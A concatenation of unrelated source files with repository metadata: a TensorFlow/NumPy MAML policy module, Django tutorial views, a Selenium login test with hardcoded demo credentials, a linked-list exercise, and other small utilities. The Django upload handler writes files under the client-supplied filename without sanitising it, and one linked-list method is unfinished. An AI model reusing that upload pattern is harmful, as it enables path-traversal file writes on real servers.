"CC-BY-4.0",
"Apache-2.0"
] | permissive | ishine/google-research | 541aea114a68ced68736340e037fc0f8257d1ea2 | c1ae273841592fce4c993bf35cdd0a6424e73da4 | refs/heads/master | 2023-06-08T23:02:25.502203 | 2023-05-31T01:00:56 | 2023-05-31T01:06:45 | 242,478,569 | 0 | 0 | Apache-2.0 | 2020-06-23T01:55:11 | 2020-02-23T07:59:42 | Jupyter Notebook | UTF-8 | Python | false | false | 9,160 | py | # coding=utf-8
# Copyright 2023 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains policies used in MAML."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import numpy as np
import tensorflow.compat.v1 as tf
import tensorflow_probability as tfp
class Policy(object):
r"""Abstract class for different policies \Pi: S -> A.
Class is responsible for creating different policies and provides an interface
for computing actions recommended by policies in different input states.
In particular, this class provides an interface that accepts compressed
vectorized form of the policy and decompresses it.
Standard procedure for improving the parameters of the policy with an
interface given by the class:
policy = policies.ParticularClassThatInheritsFromBaseClass(...)
vectorized_network = policy.get_initial()
while(...):
new_vectorized_network = SomeTransformationOf(vectorized_network)
policy.update(new_vectorized_network)
and SomeTransformationOf is a single step of some optimization procedure such
as gradient descent that sees the policy in the vectorized form.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def update(self, vectorized_parameters):
"""Updates the policy using new parameters from <vectorized_parameters>.
Updates the parameters of the policy using new parameters encoded by
<vectorized_parameters>. The size of the vector <vectorized_parameters>
should be the number of all biases and weights of the neural network.
We use the convention where parameters encoding matrices of connections of
the neural network come in <vectorized_parameters> before parameters
encoding biases and furthermore the order in <vectorized_parameters> of
parameters encoding weights for different matrices/biases-vectors is
inherited from the order of these matrices/biases-vectors in the
decompressed neural network. Details regarding compression depend on
different neural network architectures used (such as: structured and
unstructured) and are given in the implementations of that abstract method
in specific classes that inherit from Policy.
Args:
vectorized_parameters: parameters of the neural network in the vectorized
form.
Returns:
"""
raise NotImplementedError('Abstract method')
@abc.abstractmethod
def get_action(self, state):
"""Returns the action proposed by a policy in a given state.
Returns an action proposed by the policy in <state>.
Args:
state: input state
Returns:
Action proposed by the policy represented by an object of the class in a
given state.
"""
raise NotImplementedError('Abstract method')
@abc.abstractmethod
def get_initial(self):
"""Returns the default parameters of the policy in the vectorized form.
Initial parameters of the policy are output in the vectorized form.
Args:
Returns:
Numpy array encoding in the vectorized form initial parameters of the
policy.
"""
raise NotImplementedError('Abstract method')
@abc.abstractmethod
def get_total_num_parameters(self):
"""Outputs total number of parameters of the policy.
Args:
Returns:
Total number of parameters used by the policy.
"""
raise NotImplementedError('Abstract method')
class BasicTFPolicy(Policy):
"""Basic Policy implemented in Tensorflow."""
def __init__(self, state_dimensionality, action_dimensionality, hidden_layers,
scope):
self.state_dimensionality = state_dimensionality
self.action_dimensionality = action_dimensionality
self.input_ph = tf.placeholder(
dtype=tf.float32, shape=[None, self.state_dimensionality])
self.output_ph = tf.placeholder(
dtype=tf.float32, shape=[None, self.action_dimensionality])
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
self.out = self.input_ph
for i, layer_size in enumerate(hidden_layers):
self.out = tf.layers.dense(
self.out, layer_size, activation=tf.nn.relu, name='h' + str(i))
self.main_out = tf.layers.dense(
self.out, self.action_dimensionality, name='main_out')
self.secondary_out = tf.layers.dense(
self.out, self.action_dimensionality, name='secondary_out')
self.action = tfp.distributions.Normal(
loc=self.main_out, scale=self.secondary_out).sample()
self.loss = tf.losses.mean_squared_error(self.main_out, self.output_ph)
self.obj_tensor = -1.0 * self.loss
self.tf_params = tf.trainable_variables(scope)
self.shapes = [v.shape.as_list() for v in self.tf_params]
self.sizes = [int(np.prod(s)) for s in self.shapes]
self.total_nb_parameters = sum(self.sizes)
self.assign_ph_dict = {
v: tf.placeholder(dtype=tf.float32, shape=v.shape.as_list())
for v in self.tf_params
}
self.assign_ops = []
for v in self.tf_params:
self.assign_ops.append(v.assign(self.assign_ph_dict[v]))
with tf.control_dependencies(self.assign_ops):
# This is needed to input Numpy Params into network temporarily
self.action = tf.identity(self.action)
self.sess = tf.Session()
self.sess.run(tf.global_variables_initializer())
self.np_params = np.concatenate([
self.sess.run(tf.reshape(tf_param, [-1])) for tf_param in self.tf_params
])
def update(self, flattened_weights):
self.np_params = flattened_weights
def get_action(self, state):
ph_dict = {}
for ind, v in enumerate(self.tf_params):
numpy_flat_val = self.np_params[sum(self.sizes[:ind]
):sum(self.sizes[:ind + 1])]
numpy_reshaped = np.reshape(numpy_flat_val, self.shapes[ind])
v_ph = self.assign_ph_dict[v]
ph_dict[v_ph] = numpy_reshaped
ph_dict[self.input_ph] = state.reshape(-1, self.state_dimensionality)
action_numpy = self.sess.run(self.action, feed_dict=ph_dict)
return action_numpy.flatten()
def get_initial(self):
return self.np_params
def get_total_num_parameters(self):
return self.total_nb_parameters
class DeterministicNumpyPolicy(Policy):
"""Deterministic Policy implemented in Numpy."""
def __init__(self,
state_dimensionality,
action_dimensionality,
hidden_layers,
init_sd=None):
self.state_dimensionality = state_dimensionality
self.action_dimensionality = action_dimensionality
self.layers = hidden_layers + [action_dimensionality]
self.layers.insert(0, state_dimensionality)
self.weights = []
self.biases = []
self.weight_positions = []
self.bias_positions = []
self.init_params = []
flat_pos = 0
for dims in zip(self.layers[:-1], self.layers[1:]):
in_size = dims[0]
out_size = dims[1]
if init_sd is None:
init_sd = np.sqrt(2.0 / (in_size))
init_weights = init_sd * np.random.normal(0, 1, size=(out_size * in_size))
self.init_params.extend(init_weights.tolist())
self.weights.append(np.reshape(init_weights, (out_size, in_size)))
self.weight_positions.append(flat_pos)
flat_pos += out_size * in_size
init_biases = np.zeros(out_size)
self.init_params.extend(init_biases.tolist())
self.biases.append(init_biases)
self.bias_positions.append(flat_pos)
flat_pos += out_size
self.weight_positions.append(flat_pos)
def update(self, flat_weights):
for i, dims in enumerate(zip(self.layers[:-1], self.layers[1:])):
in_size = dims[0]
out_size = dims[1]
start_pos = self.weight_positions[i]
end_pos = start_pos + (out_size * in_size)
self.weights[i] = np.reshape(
np.array(flat_weights[start_pos:end_pos]), (out_size, in_size))
start_pos = self.bias_positions[i]
end_pos = start_pos + out_size
self.biases[i] = np.reshape(
np.array(flat_weights[start_pos:end_pos]), (out_size))
def get_action(self, state):
neuron_values = np.reshape(np.array(state), (self.state_dimensionality))
for i in range(len(self.weights)):
neuron_values = np.matmul(self.weights[i], neuron_values)
neuron_values += self.biases[i]
if i < len(self.weights) - 1:
np.maximum(neuron_values, 0, neuron_values)
np.tanh(neuron_values, neuron_values) # this is sometimes not needed
return neuron_values
def get_initial(self):
return np.array(self.init_params)
def get_total_num_parameters(self):
return self.weight_positions[-1]
| [
"[email protected]"
] | |
3b8746a1cdd4600634297132c55f8cb3205475c4 | d8349b7c3ca5289ea4627719699ae88b536fa24e | /uhr.py | bb9d4cef9887219b82c8773ba0814e754bdfe453 | [] | no_license | Mighty-Yth/Affinity | 8277ae59785f5663b1458e579f9f49e7719b4871 | a4f92421f014c0b296596234b0727bb2b0f526f1 | refs/heads/master | 2020-03-28T20:29:42.009120 | 2018-09-17T06:00:18 | 2018-09-17T06:00:18 | 149,075,792 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 497 | py | import discord
from discord.ext import commands
class Uhr:
def __init__(self, identity,user,EXP):
self.identity = identity
self.user= user
self.EXP = EXP
def __str__(self):
return self.identity + ':' + self.user+':' + str(self.EXP)
def deposit(self,amount):
if amount >= 0:
self.EXP += amount
def remove(self,amount):
if amount >= 0 and amount<= self.EXP:
self.EXP -= amount | [
"[email protected]"
] | |
cfc2649bb2c931a5ec92ad39694840b9daa025f2 | 9c1223036fd5259875458a8cf40eed7e2d3edf7a | /booktest/views.py | eea0893ab92e26959c416e885ce7ae0a1a3f0d2f | [] | no_license | oldestcrab/django_182 | 57c180a17d733026727b5f783195d8e0d009ecff | df4bb8933be6a189c0d4af7a55b33f60fff6289b | refs/heads/master | 2020-05-31T14:57:20.585054 | 2019-06-26T06:28:49 | 2019-06-26T06:28:49 | 190,344,540 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,095 | py | from django.shortcuts import render, redirect
from django.http import HttpResponse, JsonResponse
from django.conf import settings
import os
from .models import *
from django.core.paginator import *
def index(request):
return HttpResponse('hello')
def detail(request, p1, p2, p3):
return HttpResponse('year:{p1},month:{p2},day:{p3}'.format(p1=p1, p2=p2, p3=p3))
def get_test1(request):
return render(request, 'booktest/get_test1.html')
def get_test2(request):
a1 = request.GET['a']
b1 = request.GET['b']
c1 = request.GET['c']
context = {'a':a1, 'b':b1, 'c':c1}
return render(request, 'booktest/get_test2.html', context)
def get_test3(request):
a1 = request.GET.getlist('a')
context = {'a':a1}
return render(request, 'booktest/get_test3.html', context)
def post_test1(request):
return render(request, 'booktest/post_test1.html')
def post_test2(request):
uname = request.POST['uname']
upwd = request.POST['upwd']
ugender = request.POST['ugender']
uhobby = request.POST.getlist('uhobby')
context = {'uname':uname, 'upwd':upwd, 'ugender':ugender, 'uhobby':uhobby}
return render(request, 'booktest/post_test2.html', context)
def session1(request):
uname = request.session.get('myname')
context = {'uname':uname}
return render(request, 'booktest/session1.html', context)
def session2(request):
return render(request, 'booktest/session2.html')
def session2_handle(request):
uname = request.POST['uname']
request.session['myname'] = uname
return redirect('/booktest/session1/')
def session3(request):
del request.session['myname']
return redirect('/booktest/session1/')
# csrf
def csrf1(request):
return render(request, 'booktest/csrf1.html')
def csrf2(request):
uname = request.POST['uname']
return HttpResponse(uname)
def upload_pic(request):
return render(request, 'booktest/upload_pic.html')
def upload_handle(request):
pic1 = request.FILES['pic1']
fname = os.path.join(settings.MEDIA_ROOT[0], str(pic1.name))
with open(fname, 'wb') as f:
for c in pic1.chunks():
f.write(c)
return HttpResponse(fname)
def herolist(request, pindex):
list = HeroInfo.objects.all()
paginator = Paginator(list, 4)
print(pindex)
if pindex =='':
pindex = '1'
page = paginator.page(int(pindex))
context = {'page':page}
return render(request, 'booktest/herolist.html', context)
def area(request):
return render(request, 'booktest/area.html')
def area2(request, id):
id1 = int(id)
if id1 == 0:
data = AreaInfo.objects.filter(parea__isnull=True)
else:
data=[{}]
list = []
for area in data:
list.append([area.id, area.title])
return JsonResponse({'data':list})
def city(request, id):
citylist = AreaInfo.objects.filter(parea_id=id)
list = []
for item in citylist:
list.append({'id':item.id, 'title':item.title})
return JsonResponse({'data':list})
def html_editor(request):
return render(request, 'booktest/html_editor.html') | [
"[email protected]"
] | |
c92b4463310cabc5b593f28b34d7d29802149be3 | 8f4e9d24de3dfbd2efae58877ab0043a7da57831 | /Learn_PhythonEx/ex6.py | a9b2054e8db34cbb6de3068fbfe0bc208451d780 | [] | no_license | dersonnex/Python_learning | 1cbcfe428a4765adabdca65d275b63c37acb0ea8 | 7827962c5f208b36c6511a20d220cba609494853 | refs/heads/master | 2021-01-12T06:00:52.179117 | 2017-11-14T09:43:54 | 2017-11-14T09:43:54 | 77,274,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 549 | py | x= "There are %d types of people." % 10 # defines veriable X
binary = "binary" # defines veriable binary
do_not = "don't" # defines veriable do_not
y = "Those who know %s and those who %s." % (binary, do_not) # defines veriable y
print x
print y
print "I said: %r." % x #I said :there are 10 types of people.
print "I also said: '%s'." % y
hilarious = False
joke_evaluation = "Isn't that joke so fanny?! %r"
print joke_evaluation % hilarious
w = "This is the left side of ..."
e = "a string with a right side."
print w + e | [
"[email protected]"
] | |
31541650d86bad1487aa424be00d8d85b69f5bed | a7da58ad91b007b3650003708eb91928f1e3684a | /bt5/erp5_wizard/WorkflowTemplateItem/portal_workflow/express_person_interaction_workflow/scripts/Assigment_openGlobalUserAssignment.py | edc6962f8dcdb769f3c5bbbaa8e6713520f5fb3f | [] | no_license | jgpjuniorj/j | 042d1bd7710fa2830355d4312a6b76103e29639d | dc02bfa887ffab9841abebc3f5c16d874388cef5 | refs/heads/master | 2021-01-01T09:26:36.121339 | 2020-01-31T10:34:17 | 2020-02-07T04:39:18 | 239,214,398 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 115 | py | assignment = state_change['object']
person = assignment.getParentValue()
person.Person_validateGlobalUserAccount()
| [
"[email protected]"
] | |
29062d2f0a805afd6dd76b3910c7c60daac28586 | 4178f2916d2da72cbb45454fbed941dcfe8f6460 | /POM_test/TestCase/Planting/TC_024.py | c2bd74617e33da7d058bb5c6912275c3dd5bd85e | [] | no_license | maxcrup007/Selenium_Webdriver_Python | 15196cb04ba5cafdc5b776c26d167f0b48fb0e14 | 6be7f0b9f53df1ba592957029e8a4d22e409d1c4 | refs/heads/main | 2023-03-24T21:04:31.976451 | 2021-03-22T09:16:04 | 2021-03-22T09:16:04 | 349,379,454 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,607 | py |
# ทดสอบการเข้าใช้งานของ "ปลูก" (เลือกจำนวนเพาะปลูกมากกว่าพื้นที่)
import time
import unittest
import sys
from selenium import webdriver
from POM_test.login import *
from POM_test.plantPage import *
import os
sys.path.append(os.path.join(os.path.dirname(__file__), "...", "..."))
class TestPlanting_24(unittest.TestCase):
@classmethod
def setUpClass(self):
self.driver = webdriver.Chrome(executable_path="C:/Users/voraw/Downloads/Compressed/webdriver/chromedriver/chromedriver")
self.driver.implicitly_wait(10)
self.driver.maximize_window()
def test_login_valid(self):
driver = self.driver
self.driver.get("https://top-upstream-client.mulberrysoft.com/#/older/activity")
login = LoginPage(driver)
login.enter_username("demo005")
login.enter_password("123456")
login.click_login()
time.sleep(2)
plant = PlantPage(driver)
plant.into_plantPage()
plant.upload_picture()
time.sleep(2)
plant.next_function()
time.sleep(2)
plant.plant_enter_value("1000000")
# เลือกจำนวนเพาะปลูกมากกว่าพื้นที่
time.sleep(2)
plant.plant_enter_area("10")
time.sleep(2)
plant.plant_enter_crops()
time.sleep(2)
# driver.find_element_by_xpath("//ion-list[2]/ion-item/ion-select").click()
# driver.find_element_by_xpath("//button/div/div[2]").click()
# driver.find_element_by_xpath("//button[2]/span").click()
plant.plant_enter_garden()
time.sleep(2)
plant.plant_enter_unit()
time.sleep(2)
plant.plant_enter_area_unit()
time.sleep(2)
########################################################################
plant.plant_enter_products("100")
time.sleep(2)
plant.plant_enter_unit_products()
time.sleep(2)
plant.plant_enter_paid("1500")
time.sleep(2)
plant.plant_enter_submit()
time.sleep(2)
@classmethod
def tearDownClass(cls):
cls.driver.close()
cls.driver.quit()
print("Test Completed")
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
e3275a76d2f0ad30f2d8dc25ef528b0dd70399d0 | 6f9a29946dc107cd44d88cf07c9d715ebe4208be | /source/services/music/music_service.py | 61d9a993b50f6a801a8e9c6457c4172dae92f090 | [] | no_license | cash2one/gongzhuhao | 66bb14439a2265175bdd4b2f585456fcf47922bf | 0596bcb429674b75243d343c73e0f022b6d86820 | refs/heads/master | 2021-01-18T15:38:37.258737 | 2015-10-28T09:13:33 | 2015-10-28T09:13:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,709 | py | #encoding:utf-8
__author__ = 'frank'
from services.base_services import BaseService
from models.share_do import ShareMusic
from utils.upload_utile import delete_from_oss
from tornado.options import options
class MusicServices(BaseService):
def create_share_music(self,**kwargs):
'''
todo:新增一首背景歌曲
:param kwargs:
:return:
'''
share_music = ShareMusic()
share_music.Fmusic_name = kwargs.get('music_name')
share_music.Fmusic_url = kwargs.get('request_url')
self.db.add(share_music)
self.db.commit()
return share_music
def query_share_music(self,**kwargs):
'''
todo:查询背景歌曲
:param kwargs:
:return:
'''
query = self.db.query(ShareMusic).filter(ShareMusic.Fdeleted == 0)
if kwargs.get('start_date',''):
query = query.filter(ShareMusic.Fcreate_time > kwargs.get('start_date'))
if kwargs.get('end_date',''):
query = query.filter(ShareMusic.Fcreate_time < kwargs.get('end_date')+' 23:59:59')
if kwargs.get('music_name',''):
query = query.filter(ShareMusic.Fmusic_name.like('%'+kwargs.get('music_name')+'%'))
return query
def delete_music(self,music_id):
'''
todo:删除背景歌曲
:param music_id: 歌曲id
:return:
'''
query = self.db.query(ShareMusic).filter(ShareMusic.Fdeleted == 0,ShareMusic.Fid == music_id)
filename = query.scalar().Fmusic_url[34:]
data = {}
data['Fdeleted'] = 1
query.update(data)
self.db.commit()
delete_from_oss(options.MEDIA_BUCKET,filename)
| [
"[email protected]"
] | |
87e809d46157208ddbaf6781030cfc9bc9ad8438 | b3f1d75955f3ef15b4c55e4ad79d73b3797ec318 | /django-backend/djangoapi/tests.py | 448ec74fa89ea606bc66e2347098316c3cac403c | [] | no_license | christiancp100/VRecommender-3.0 | da600008c5542fa10e4e10da110c7a9ea90f5494 | 9bfd0c1d4e1b536e70c3a32497c829fa099d22cf | refs/heads/master | 2023-07-31T17:52:23.330726 | 2020-06-05T15:05:57 | 2020-06-05T15:05:57 | 269,671,457 | 0 | 0 | null | 2021-09-22T19:09:40 | 2020-06-05T14:48:43 | Vue | UTF-8 | Python | false | false | 995 | py | from django.test import TestCase
from djangoapi import search
from elasticsearch import Elasticsearch
import requests
class ElasticsearchTestCase(TestCase):
def setUp(self):
self.client = Elasticsearch("http://elasticsearch:9200")
self.all_indices = self.client.indices.get_alias("*")
def test_connection(self):
status = self.client.ping()
self.assertTrue(status)
def test_index_existance(self):
exist = "objects" in self.all_indices
self.assertTrue(exist)
class QueriesTestCase(TestCase):
def setUp(self):
self.fieldsList = requests.get('http://llocalhost:8000/columns')
# TODO
# def test_describe_query(self):
# for field in self.fieldsList:
# if field['type'] == numerical:
# response = requests.get('http://localhost:8000/describe/?column=' + field['value'])
# if responsep['count']
class EndPointsTestCase(TestCase):
def setUp(self):
pass
| [
"[email protected]"
] | |
e64bb6ef3ac9bc9aa5a6be96f65b399ba60f4587 | ee9d1da814af64064de49e777e6fe983f92e7621 | /old/PSD_Plotter.py | 0989cea9eff5da0e3e42fe57532f837a02d92550 | [] | no_license | nm96/MSc_project_code | 8506fab47b291cffb4a9558da52a486a4dca290f | 7b8b02b6b5dce0c09adf8e5ca2c3f464c4e6eff1 | refs/heads/master | 2022-12-14T20:34:53.432790 | 2020-09-13T15:06:31 | 2020-09-13T15:06:31 | 274,463,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,552 | py | import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker
from matplotlib import rc
import sys
import pickle
# Set a nice font for the plots when on Linux
if sys.platform == 'linux':
rc('font',**{'family':'serif','serif':['Computer Modern Roman']})
rc('text', usetex=True)
# Get input file from commmand line
inpf = sys.argv[1] # i.e. "spec_data.pkl"
# Read input file
with open(inpf, 'rb') as f:
params, om, P = pickle.load(f)
# Note:
# model = (mdl.NHSommerfeld2,(Om,h,B))
# params = (eps,Om,m,c,k,model)
# Get parameters to label the plot with
om_max = om[-1]
Om = params[1]
om_nat = (params[4]/params[2])**0.5
B = params[-1][-1][-1]
c = params[3]
fn = 0 # Initialize figure number for plotting
fn += 1; fig = plt.figure(fn,figsize=[12,6])
# Plot spectrum, label:
ax = fig.add_subplot(111)
ax.set_xlim([0,om_max])
ax.axvline(om_nat,ls='--',c='g',label=r"$\omega_{nat}$")
ax.axvline(Om,ls='--',c='r',label=r"$\Omega$")
ax.semilogy(om,P,c='k')
locmaj = matplotlib.ticker.LogLocator(base=100,numticks=30)
ax.yaxis.set_major_locator(locmaj)
locmin = matplotlib.ticker.LogLocator(base=100,subs=(0.2,0.4,0.6,0.8),numticks=50)
ax.yaxis.set_minor_locator(locmin)
ax.yaxis.set_minor_formatter(matplotlib.ticker.NullFormatter())
ax.grid()
ax.set_title(r"""$\beta = {:.2f}$, $\Omega = {:.2f}$, $c = {:.2f}$""".format(B,Om,c))
ax.set_ylabel("$P(\omega)$",rotation=0)
ax.yaxis.labelpad = 20
ax.set_xlabel("$\omega$")
ax.legend()
plt.tight_layout()
#fig.savefig("../plots/sparse_peak_spectrum.eps".format(B))
plt.show()
| [
"[email protected]"
] | |
b652570059fbbb90741ee3a9330e616f982e32a2 | 7694cb360b98391fb0f5c57e3b396d8211d535ea | /GUI/config.py | e2d7fd5c94a6e14d041ed94caa21cfd5f2aaf723 | [
"MIT"
] | permissive | trifwn/Atlas_Rocket | 36ec1b0e59181dab45a16743a670532eb8e4e797 | aeb8b6fea75b8f6b94af662bbaec0ae212e02bae | refs/heads/master | 2022-04-17T03:34:30.614890 | 2020-04-05T21:40:49 | 2020-04-05T21:40:49 | 229,804,020 | 1 | 0 | null | 2020-03-31T14:52:34 | 2019-12-23T18:31:23 | Python | UTF-8 | Python | false | false | 1,214 | py | import os
import time
from collections import deque
BASE_PATH = os.path.dirname(os.path.abspath(__file__))
DATA_PATH = os.path.join(BASE_PATH, "data")
def init():
'''
Defining globals and initializing them
'''
max_length = 100
global times, temperature, pressure, humidity, altitude, or_x, or_y, or_z, vel_x, vel_y, vel_z, acc_x, acc_y, acc_z
times = deque(maxlen=max_length)
temperature = deque(maxlen=max_length)
pressure = deque(maxlen=max_length)
humidity = deque(maxlen=max_length)
altitude = deque(maxlen=max_length)
#orientation
or_x = deque(maxlen=max_length)
or_y = deque(maxlen=max_length)
or_z = deque(maxlen=max_length)
#velocity
vel_x = deque(maxlen=max_length)
vel_y = deque(maxlen=max_length)
vel_z = deque(maxlen=max_length)
#acceleration
acc_x = deque(maxlen=max_length)
acc_y = deque(maxlen=max_length)
acc_z = deque(maxlen=max_length)
global data_dict
data_dict = {
'Temperature': temperature,
'Pressure': pressure,
'Humidity': humidity,
'Altitude': altitude,
'3D Cone plot': (vel_x, vel_y, vel_z, or_x, or_y, or_z),
'x-y-z-move': (or_x, or_y, or_z),
'Velocity for x-y-z': (vel_x, vel_y, vel_z),
'Acceleration for x-y-z': (acc_x, acc_y, acc_z)
} | [
"[email protected]"
] | |
ca80285ee2929ac20cf43ad7fff92fb60b9efdea | f81c8e4d702d5c88af92c691d35b6f9c0d2f4390 | /backend/dark_waterfall_26026/wsgi.py | e5039146e98431c055564aea9a661c25a52173fd | [] | no_license | crowdbotics-apps/dark-waterfall-26026 | bdfd44240dae3c1ad20ed8b7a8da701308db5958 | 95f9eda959b6d21778ff59db2c5c9a585d6a670c | refs/heads/master | 2023-04-12T17:31:25.091727 | 2021-04-29T19:14:56 | 2021-04-29T19:14:56 | 362,922,208 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | """
WSGI config for dark_waterfall_26026 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'dark_waterfall_26026.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
504995a982f5fa75f2c1793615bc2e989fee7a9c | 5663ad19d3773400f60da4e1cabcb3312894e62b | /linkedlist.py | a135fc32d30425de0164010c3654a25c10aef361 | [] | no_license | maihan040/Python_Random_Scripts | a265a556f65d5f8b779b37dac1f68f089f4bf343 | 2c649c3668adcc3c155387b8c7c88a07b50af39a | refs/heads/main | 2023-04-11T17:11:29.439860 | 2021-05-08T17:59:54 | 2021-05-08T17:59:54 | 360,765,179 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,338 | py | #
#module name: linkedlist.py
#
#purpose: class definition for a linked list
#
#date created: 09/04/2019
#
#version: 1.0
#
#########################################################
# Import modules #
#########################################################
import node
#########################################################
# Class definition #
#########################################################
class linkedlist:
#constructor
def __init__ (self, head=None):
self.head = head
#print
def printList(self):
current = self
while current.next is not None:
print(str(current.data) + "->", end="")
current = current.next
print(current.data)
#iterative apprach
def mergeListIterative(self, l1, l2):
#locale names
current = None
root = None
while(True):
if(l1 == None):
nextNode = l2
elif(l2 == None):
nextNode = l1
elif(l1.data < l2.data):
nextNode = l1
else:
nextNode = l2
#advance the position in the respective linkedlist
if(nextNode == l1):
l1 = l1.next if l1 else None
if(nextNode == l2):
l2 = l2.next if l2 else None
#check if end has been reached
if(nextNode == None):
break
#merge the list
if not current:
current = nextNode
root = current
else:
current.next = nextNode
current = nextNode
#return the root of the merged linked list
return root
#recuriseve approach
def mergeListRecursive(self, l1, l2):
#base case
if(l1 == None):
return l2
elif(l2 == None):
return l1
elif(l1.data < l2.data):
l1.next = self.mergeListRecursive(l1.next, l2)
return l1
else:
l2.next = self.mergeListRecursive(l1, l2.next)
return l2
#add two numbers represented as linked lists
#Recursive function
def addNum(self, first, second):
root = None
prev = None
temp = None
carry = 0
while(first is not None and second is not None):
fdata = 0 if first is None else first.data
sdata = 0 if second is None else second.data
sum = fdata + sdata + carry
#compute the next carry
carry = 1 if sum >= 10 else 0
sum = sum if sum < 10 else sum %10
print("Sum is : " +str(sum))
temp = node.node(sum)
#check wheter the head of this list is empty
if root is None:
root = temp
else:
prev.next = temp
prev = temp
#advance both lists
if first is not None:
first = first.next
if second is not None:
second = second.next
#add remaining carry if any
if carry:
temp.next = node.node(carry)
#return the root
return root
#reverse list via an iterative approach
def reverselistIteratively(self, head):
if(head == None):
return None
#pointers used to keep track as we traverse the list
root = None
prev = head
current = prev.next
nxt = head.next.next
prev.next = None
#traverse the list
while(nxt.next != None):
current.next = prev
prev = current
current = nxt
nxt = nxt.next
#point the last two nodes
current.next = prev
nxt.next = current
root = nxt
#return the new head
return root
#reverse list via a recursive approach
def reverseListRecursive(self, curr, prev=None):
#base case
if curr == None:
return None
if curr.next == None:
curr.next = prev
return
#########################################
# Driver #
#########################################
a = node.node(1)
a.next = node.node(3)
a.next.next = node.node(5)
b = node.node(2)
b.next = node.node(8)
b.next.next = node.node(6)
c = node.node(10)
c.next = node.node(12)
c.next.next = node.node(14)
d = node.node(11)
d.next = node.node(13)
d.next.next = node.node(15)
'''
#iteratirve approach
print("-------------------------------------------------------------")
print("Iterative apprach ")
print("First list " )
a.printList()
print("Second list ")
b.printList()
print("Merging both lists via iterative approach")
result_iterative = linkedlist().mergeListIterative(a,b)
print("The merged linked list is: ")
result_iterative.printList()
#recursive apprach
print("-------------------------------------------------------------")
print("Recursive apprach ")
print("First list ")
c.printList()
print("Second list")
d.printList()
print("Merging both lists via recursive approach")
result_recursive = linkedlist().mergeListRecursive(c,d)
print("Merged linked list is: ")
result_recursive.printList()
#add numbers
print("-------------------------------------------------------------")
print("Adding lists")
print("First list ")
a.printList()
print("Second list")
b.printList()
print("Adding both numbers")
result_sum = linkedlist().addNum(a,b)
print("Added linked list is: ")
result_sum.printList()
#reverse list via an iterative approach
print("-------------------------------------------------------------")
print("Reversing list iteratively")
print("List before reversal ")
a.printList()
rev_list = linkedlist().reverseListRecursive(a, None)
print("After reversal list is: ")
rev_list.printList()
'''
#recursive apprach
print("-------------------------------------------------------------")
print("Recursive apprach ")
print("First list ")
c.printList()
print("Second list")
d.printList()
print("Merging both lists via recursive approach")
result_recursive = linkedlist().mergeListRecursive(c,d)
print("Merged linked list is: ")
result_recursive.printList() | [
"[email protected]"
] | |
fa65a404c6278a30b5a8e1d2c8079c85f4f85dce | 449f6888bff99d7e4fd86fa6ffa6b3316084e34e | /Solutions/018.py | b91be816ebd66827c26c6ae1526c59a9b3b118b9 | [
"MIT"
] | permissive | All3yp/Daily-Coding-Problem-Solutions | e94679a5858b8a83ffe58d14b824fe80de21a694 | 199b9606474edb45bd14b20b511b691ada437586 | refs/heads/master | 2023-03-18T21:06:30.675503 | 2021-03-13T03:52:31 | 2021-03-13T03:52:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,622 | py | """
Problem:
Given an array of integers and a number k, where 1 <= k <= length of the array, compute
the maximum values of each subarray of length k.
For example, given array = [10, 5, 2, 7, 8, 7] and k = 3, we should get: [10, 7, 8, 8],
since:
10 = max(10, 5, 2)
7 = max(5, 2, 7)
8 = max(2, 7, 8)
8 = max(7, 8, 7)
Do this in O(n) time and O(k) space. You can modify the input array in-place and you do
not need to store the results. You can simply print them out as you compute them.
"""
from collections import deque
from typing import List
def calc_max_per_k_elems(arr: List[int], k: int) -> List[int]:
length = len(arr)
if not arr:
return None
if length <= k:
return max(arr)
# storing results (even though the problem states it can be directly printed)
result = []
dq = deque()
# calculating the 1st element
for i in range(k):
while dq and arr[dq[-1]] < arr[i]:
dq.pop()
dq.append(i)
result.append(arr[dq[0]])
# generating the rest of the resultant elements
for i in range(k, length):
# removing all elements apart from the last k elements
while dq and dq[0] <= i - k:
dq.popleft()
# removing the elements smaller than the current element
while dq and arr[dq[-1]] < arr[i]:
dq.pop()
dq.append(i)
result.append(arr[dq[0]])
return result
if __name__ == "__main__":
print(calc_max_per_k_elems([10, 5, 2, 7, 8, 7], 3))
print(calc_max_per_k_elems([1, 91, 17, 46, 45, 36, 9], 3))
"""
SPECS:
TIME COMPLEXITY: O(n)
SPACE COMPLEXITY: O(k)
"""
| [
"[email protected]"
] | |
9717ae1685d9e0be1f4fca244bca7a10cb2aeb8b | c2cd846ea3d2947587a5bfe1ad8cfc419e0fc98f | /gui/app.py | c345b7be2ccd5925f810121a5350d92dcf4263aa | [
"MIT"
